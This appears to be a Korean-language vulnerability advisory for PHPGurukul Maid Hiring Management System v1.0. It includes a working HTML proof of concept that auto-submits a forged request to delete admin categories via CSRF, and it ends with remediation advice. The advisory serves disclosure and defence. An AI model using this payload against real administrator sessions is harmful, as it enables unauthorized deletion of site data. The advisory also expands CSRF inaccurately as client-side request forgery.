
PHPGurukul Maid Hiring Management System v1.0의 CSRF 취약점에 대한 개념 증명(PoC)으로, 조작된 악성 링크를 통해 승인되지 않은 카테고리 삭제를 시연합니다.
프로젝트 이름 및 저장소 URL: PHP와 MySQL을 사용하는 메이드 고용 관리 시스템
취약점 유형: 클라이언트 측 요청 위조
영향 받는 버전: v1.0
💣취약점 설명: PHPGurukul Hiring Management System의 관리자 패널에 CSRF(Cross-Site Request Forgery) 취약점이 존재합니다. 이로 인해 공격자는 인증된 관리자를 악성 사이트로 유인하여 임의의 채용 카테고리를 삭제할 수 있습니다. 이는 데이터 삭제 및 권한 없는 관리자 수준 변경으로 이어질 수 있습니다.
👩💻영향: 승인되지 않은 카테고리 삭제.
🛜개념 증명 (PoC):

/admin/manage-category.php로 GET 요청을 보내는 HTML 코드
CSRF-POC<html>
<body>
<form action="http://127.0.0.1/mhms/admin/manage-category.php">
<input type="hidden" name="delid" value="13" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


권장 사항: 관리자 양식에 CSRF 토큰 구현, SameSite 쿠키 적용, 요청 출처 검증을 통해 무단 작업을 방지하세요.